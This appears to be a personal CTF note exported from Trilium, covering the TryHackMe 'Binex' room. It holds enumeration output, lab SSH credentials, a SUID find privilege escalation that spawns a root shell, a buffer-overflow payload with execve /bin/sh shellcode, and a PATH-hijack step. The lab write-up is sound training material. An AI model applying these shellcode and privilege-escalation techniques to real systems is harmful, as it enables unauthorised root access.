<html>
  
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="../../../style.css">
    <base target="_parent">
    <title data-trilium-title>Binex</title>
  </head>
  
  <body>
    <div class="content">
       <h1 data-trilium-h1>Binex</h1>

      <div class="ck-content">
        <p>found with <code>enum4linux -a &lt;IP&gt;</code>

        </p>
        <p>S-1-22-1-1000 Unix User\kel (Local User)
          <br />S-1-22-1-1001 Unix User\des (Local User)
          <br />S-1-22-1-1002 Unix User\tryhackme (Local User)
          <br />S-1-22-1-1003 Unix User\noentry (Local User)
          <br /> </p>
        <p>ssh login: tryhackme:thebest</p>
        <p><code>find / -perm -u=s -type f 2&gt;/dev/null | less -r</code> for find
          suid files, simple suid find privesc from gtfobins</p>
        <p><code>/usr/bin/find . -exec /bin/bash -p \; -quit</code>  password: destructive_72656275696c64</p>
        <p><code>python -c "print('\x90'*108 + '\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05' + 'A'*484 + '\x68\xe2\xff\xff\xff\x7f\x00\x00')"</code>

        </p>
        <p>64 bit binaries need &lt;offset number&gt; + &lt;8 extra&gt; + &lt;overwritten
          eip 8 bytes&gt;</p>
        <p>for root, a modified code , compiled simply with gcc and $PATH variable
          set to its dir like <code>export PATH=/home/kel:$PATH</code>

        </p>
        <p>
          <br /> </p>
      </div>
    </div>
  </body>

</html>